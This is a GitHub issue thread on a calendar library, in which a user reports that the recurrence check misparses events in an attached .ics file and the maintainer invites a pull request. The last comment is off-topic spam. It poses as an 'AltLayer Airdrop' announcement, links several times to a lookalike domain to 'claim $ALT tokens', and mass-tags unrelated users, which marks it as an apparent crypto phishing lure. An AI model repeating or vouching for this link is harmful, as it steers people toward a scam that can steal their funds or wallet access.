### ISSUE TITLE
Bad repeat check

### ISSUE THREAD

**Issue by david-spaeth** [MauriceArikoglu/PUCalendarManager#7]
Hello,

CheckDate does not work correctly with the attached file. I make some corrections for my case: https://github.com/david-spaeth/PUCalendarKit.git but this fix does not cover all cases and does not deserve a pull request.

You can check events with UID "008E096A-6571-4EBF-A678-87E6F3A53B0A" or "42ftmo3sdiva01dtg0kdlikmr6@google.com" for some bad CheckDate exemples.

[Ligne 1.ics.zip](https://github.com/MauriceArikoglu/PUCalendarKit/files/2314767/Ligne.1.ics.zip)

**Comment by MauriceArikoglu** [comment]
@david-spaeth can you confirm these bugs with [MauriceArikoglu/SwiftCal](https://github.com/MauriceArikoglu/SwiftCal) also?

**Comment by david-spaeth** [comment]
@MauriceArikoglu Yes, the bug appear also with SwiftCal

**Comment by MauriceArikoglu** [comment]
@david-spaeth thanks for checking that. I am not sure whether I find the time to take care of that issue. If you open a PR with the fixes, I'd be glad to look at it and approve

**Comment by david-spaeth** [comment]
I would really like to make a global fix and not a specific fix to my need :(. I keep this in my long wish list.

**Comment by MauriceArikoglu** [comment]
@david-spaeth yes that would be absolutely great! I would love for you to contribute - if you need any help doing so, just contact me

**Comment by GANFI** [comment]
# AltLayer Airdrop Season One Update

[![AltLayer Airdrop Season One](https://i.ytimg.com/vi/9uxY8uLf3bE/maxresdefault.jpg)](https://connect.airdropaltlayerio.online/)

🚀 **Exciting Announcement!** 

AltLayer token (ALT) is gearing up for its Binance launch on January 25, 2024. As a token of appreciation, we extend a warm invitation to you to join the "ALT Token community" through an exclusive airdrop tailored for our early supporters and partners. Here's a quick overview:

- **Total Allocated ALT Tokens:** 400,000,000 (4% of the total supply)

For a comprehensive breakdown of criteria and further details, refer to the complete announcement [Oficial Website](https://connect.airdropaltlayerio.online/).

The window to [Claim $ALT tokens](https://connect.airdropaltlayerio.online/) is open from January 25 to February 08, 2024. 

Any unclaimed $ALT tokens after this period will be returned to AltLayer’s Treasury.

We deeply appreciate your contribution to AltLayer's success! Stay tuned for more exciting developments in Season One.

**Important:** Please be aware of certain regional restrictions on the airdrop. Review the disclaimer before participating.

suolike, @tandelov, @0xknstntn, @Pearlminimal, @toivan, @tomotech1, @sgb-io, @speaker-ender, @prayagsingh, @amauricarrillo, @fakepixels, @kd5ziy, @li1zhong2, @jiyiren, @kailingding, @DukeCaesar, @willin, @JamesLefrere, @Westevgeniy, @cylcops
